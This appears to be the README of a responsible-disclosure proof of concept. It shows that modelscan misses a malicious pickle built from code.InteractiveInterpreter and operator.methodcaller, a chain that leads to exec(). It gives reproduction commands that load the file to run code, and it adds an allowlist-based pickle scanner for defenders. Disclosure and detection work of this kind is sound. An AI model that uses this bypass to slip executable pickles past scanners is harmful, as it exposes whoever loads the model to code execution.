metadata
license: mit
tags:
- security-research
- modelscan-bypass
- pickle-safety
modelscan-bypass-code-interpreter
Modelscan Bypass PoC — code.InteractiveInterpreter
Severity: CRITICAL
Impact: Full RCE via exec() — code.InteractiveInterpreter.runsource() calls exec() on arbitrary Python code
modelscan version: 0.7.6 (latest on PyPI)
Result: "No issues found!" ✅ (false negative)
Chain
code.InteractiveInterpreter() → operator.methodcaller("runsource", malicious_code) → exec(malicious_code)
Why It Works
code.InteractiveInterpreter is NOT in modelscan's unsafe_globals blocklist.
Neither the code module nor operator.methodcaller is blocked.
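A defender-side check for the gap described above, added here as an example (it is not part of this PoC or of modelscan): rather than blocklisting callables, enumerate every module/name a pickle imports with pickletools, without ever loading it, and report anything outside an allowlist. SAFE_MODULE_ROOTS is a hypothetical policy, and the sample pickles are constructed so that they only reference the classes by name; unpickling them returns the class objects and calls nothing.

```python
import code
import operator
import pickle
import pickletools

# Hypothetical allowlist of module roots a serialized model may import.
# Anything else is reported, so unlisted callables such as
# code.InteractiveInterpreter or operator.methodcaller are flagged even
# though no blocklist names them.
SAFE_MODULE_ROOTS = {"collections", "numpy", "torch"}

STRING_OPS = {"STRING", "BINSTRING", "SHORT_BINSTRING", "UNICODE",
              "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"}


def referenced_globals(data: bytes) -> list[tuple[str, str]]:
    """List (module, name) pairs a pickle imports, without executing it."""
    refs: list[tuple[str, str]] = []
    strings: list[str] = []  # recent string pushes, consumed by STACK_GLOBAL
    for op, arg, _pos in pickletools.genops(data):
        if op.name == "GLOBAL":            # protocols 0-3: arg is "module name"
            module, name = arg.split(" ", 1)
            refs.append((module, name))
        elif op.name == "STACK_GLOBAL":    # protocol 4+: module, name on stack
            # Uses the two most recent string pushes, which is what pickle.dumps
            # emits; a pickle that fetches them from the memo instead would need
            # a fuller stack emulation (limitation of this example).
            name = strings.pop()
            module = strings.pop()
            refs.append((module, name))
        elif op.name in STRING_OPS:
            strings.append(arg)
    return refs


def scan_pickle(data: bytes) -> list[str]:
    """Return dotted names of imports outside the allowlist (empty = clean)."""
    return [f"{module}.{name}" for module, name in referenced_globals(data)
            if module.split(".")[0] not in SAFE_MODULE_ROOTS]


# Constructed samples: the suspect ones only *reference* the classes
# (unpickling them yields the class objects); nothing is called.
BENIGN = pickle.dumps({"weights": [0.1, 0.2]}, protocol=4)
SUSPECT_P0 = pickle.dumps(code.InteractiveInterpreter, protocol=0)
SUSPECT_P4 = pickle.dumps((code.InteractiveInterpreter, operator.methodcaller),
                          protocol=4)

if __name__ == "__main__":
    for label, blob in [("benign", BENIGN), ("p0", SUSPECT_P0), ("p4", SUSPECT_P4)]:
        print(label, scan_pickle(blob) or "clean")
```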
Reproduction
pip install modelscan
modelscan scan -p bypass_poc.pkl
# Output: "No issues found!"
python3 -c "import pickle; pickle.loads(open('bypass_poc.pkl','rb').read())"
# Executes arbitrary code
Responsible Disclosure
This PoC is part of a responsible disclosure to ProtectAI via the Huntr MFV program.